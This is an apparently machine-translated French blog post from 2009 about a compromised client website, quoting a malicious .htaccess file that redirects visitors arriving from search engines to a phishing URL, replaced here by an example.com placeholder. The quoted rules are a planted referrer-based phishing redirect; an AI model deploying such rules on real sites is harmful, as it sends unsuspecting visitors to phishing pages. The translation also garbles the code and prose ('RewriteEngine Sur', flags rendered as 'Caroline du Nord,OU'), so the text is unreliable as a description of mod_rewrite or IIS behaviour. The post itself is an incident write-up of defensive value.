Jeudi, 22 janvier, 2009 | Auteur:

Je très récemment trouvé un problème avec le site Web d'un client en raison d'une .htaccess fichier. Le site était hébergé sur un Fenêtres serveur exécutant IIS aide IISPassword, ce qui rend l'utilisation de .htaccess dossiers de ses paramètres.

IISPassword ne suit pas exactement les mêmes règles que d' Apache cependant. Si le fichier htaccess. Existe, elle il faut contiennent des règles appropriées IISPassword, sinon le serveur ne renvoie que l'erreur suivante:

Error 500 given by IIS Password
Voici le contenu du fichier htaccess.. J'ai seulement modifié la redirection URL finale à signaler de manière appropriée à example.com:

RewriteEngine Sur
RewriteCond %{HTTP_REFERER} .*google. * $ [Caroline du Nord,OU]
RewriteCond %{HTTP_REFERER} .*aol. * $ [Caroline du Nord,OU]
RewriteCond %{HTTP_REFERER} .*msn. * $ [Caroline du Nord,OU]
RewriteCond %{HTTP_REFERER} .*yahoo. * $ [Caroline du Nord,OU]
RewriteCond %{HTTP_REFERER} .*Yandex. * $ [Caroline du Nord,OU]
RewriteCond %{HTTP_REFERER} .*randonneur. * $ [Caroline du Nord,OU]
RewriteCond %{HTTP_REFERER} .*déjà. $ [Caroline du Nord]
RewriteRule .* http://siffy-phishing-url.example.com [R,La]

Si cette étaient sur un serveur exécutant Apache mod_rewrite, la plupart des internautes iraient directement au contenu de site correct. Seulement s'ils ont atteint le site par les moteurs de recherche et index répertoriés dans le fichier. Htaccess, seraient-ils être redirigés vers l'URL de phishing siffy que le pirate veut victimes pour atteindre.

Bien sûr, le pirate (ou peut-être même un ver automatique) ne se rendent pas compte que le serveur en question n'a même pas ces règles mod_rewrite. Mais de toute façon, ce qui est très préoccupant que je peux prévoir de nombreux arguments quant à savoir si ou non le site est de travail

Partager
Vous pouvez suivre les réponses à cette entrée à travers le RSS 2.0 alimentation. Vous pouvez laisser une réponse, ou trackback à partir de votre propre site.
Laisser un commentaire » Connexion